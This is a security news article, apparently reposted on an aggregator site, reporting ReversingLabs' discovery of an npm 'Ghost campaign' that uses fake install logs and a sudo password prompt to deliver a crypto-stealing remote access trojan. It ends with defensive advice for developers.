New Npm 'Ghost Campaign' Uses Fake Install Logs to Hide Malware

A new malicious npm campaign using fake installation logs to hide malware activity has been identified by security researchers.

The attacks, discovered by ReversingLabs, involve malicious packages that mimic legitimate software installation processes while secretly downloading and executing malware designed to steal sensitive data and crypto wallets.

The campaign, dubbed the “Ghost campaign,” began in early February and includes several malicious packages with downloader functionality. These packages attempt to obtain a user’s sudo password during installation, which is later used to execute a remote access trojan (RAT) on the victim’s system.

Fake Installation Logs Used as Cover

Researchers found that the malicious packages displayed fake npm install logs to make the installation process appear legitimate.

The logs included messages about downloading dependencies, installation progress bars and random delays to simulate real installation activity. In reality, none of these actions took place.

At one point during the fake installation, users were prompted to enter their sudo password to fix a supposed installation issue or perform optimization tasks. Once entered, the password was used to execute the final malware stage without the user noticing.

Read more on supply chain attacks: Trivy Supply Chain Attack Expands With New Compromised Docker Images

The final malware payload was downloaded from external sources, including a Telegram channel and hidden web3 content. The payload was then decrypted using a key retrieved online and executed locally using the stolen sudo password.

Malware Designed to Steal Crypto and Sensitive Data

The final-stage malware was a remote access trojan capable of stealing crypto wallets, collecting sensitive information and receiving commands from a command-and-control (C2) server. Some versions included additional files that enhanced data theft capabilities.

Researchers noted that several packages shared similar code structures and techniques, suggesting either a new campaign or an early test run of a larger operation. Similar methods were also observed in other recently reported malicious npm packages.

Researchers recommend several steps to reduce exposure to malicious open-source packages:

Verify package authors and repository history
Monitor installation scripts and unusual prompts
Use automated security scanning tools
Avoid entering sudo passwords during package installation

ReversingLabs said they will continue monitoring npm repositories for similar threats and flag malicious packages as they are discovered.

Source link

What's Hot

Trident Announces Termination of Deposit Agreement, Concurrent Changes to Share Capital and Direct Listing of Ordinary Shares

Onchain Data Locks In Satoshi’s 1.1M BTC Hoard — 3 Theories on Why It Never Moves

Iren acquires Spanish AI data center developer Nostrum Group

New Npm ‘Ghost Campaign’ Uses Fake Install Logs to Hide Malware

Fake Installation Logs Used as Cover

Malware Designed to Steal Crypto and Sensitive Data

India’s NHRC Raises Alarm Over Digital Arrest Scams

Rokarolla Trojan Combines Banking Fraud With Device Surveillance

Pyra to Cease Operations Following Drift Hack, Launches Fund Withdrawal Portal

Oklahoma Raises Alarm Over Fake Crypto Returns

Phishing, deepfakes, supply chain attacks to fuel 2026’s biggest crypto hacks: CertiK

Futures Flat At All Time Highs Ahead Of Huge Week, Semis Set For 19th Day Of Gains

Coinbase to offer regulated crypto futures to US customers amid ongoing regulatory battle

What's Hot

New Npm ‘Ghost Campaign’ Uses Fake Install Logs to Hide Malware

Fake Installation Logs Used as Cover

Malware Designed to Steal Crypto and Sensitive Data

Related Posts